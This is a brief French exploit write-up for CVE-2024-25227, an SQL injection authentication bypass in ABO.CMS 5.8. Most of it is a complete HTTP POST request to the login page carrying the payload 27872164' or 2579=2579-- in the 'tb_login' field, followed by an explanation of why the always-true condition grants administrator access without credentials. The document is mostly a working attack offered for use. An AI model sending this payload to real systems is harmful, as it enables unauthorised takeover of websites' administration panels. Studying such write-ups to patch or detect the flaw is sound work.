
Exploit d'injection SQL pour ABO.CMS 5.8 qui contourne l'authentification via le paramètre tb_login, accordant un accès non authentifié au panneau d'administration. Inclut une requête HTTP PoC avec payload.
CVE-2024-25227 Exploit
CVE-2024-25227 est une vulnérabilité SQLi dans ABO.CMS 5.8 trouvée dans le paramètre 'tb_login'
POST /login.aspx HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/535.36 (KHTML, like Gecko) Chrome/104.0.5735.134 Safari/527.36
Connection: close
Cache-Control: max-age=0
Cookie: ASP.NET_SessionId=asd123hstjj
Origin: http://localhost
Upgrade-Insecure-Requests: 1
Referer: http://ip
Content-Type: application/x-www-form-urlencoded
Content-Length: 100
VIEWSTATE=%2ASDkjdkjfkgajsslfk&EVENTVALIDATION=%2;llkfopkorjaeitjru123&tb_login=27872164'%20or%202579%3d2579--%20&tb_pwd=hf%36nb4u%84X5&b_submit=+%C3+%D7+%CE+%C5+
La charge utile est tb_login=27872164'%20or%202579%3d2579--%20, ce qui sans encodage URL est : 27872164' or 2579=2579--
Avec la requête modifiée contenant la charge utile, vous dites au backend que le placeholder '27872164'' est combiné avec une condition qui est toujours vraie ('2579=2579'), et de commenter le reste de la requête avec '--' pour garantir que la requête modifiée soit injectée.
Cela contourne efficacement tous les contrôles d'authentification liés au champ 'tb_login', permettant un accès non authentifié au panneau de contrôle en tant qu'administrateur.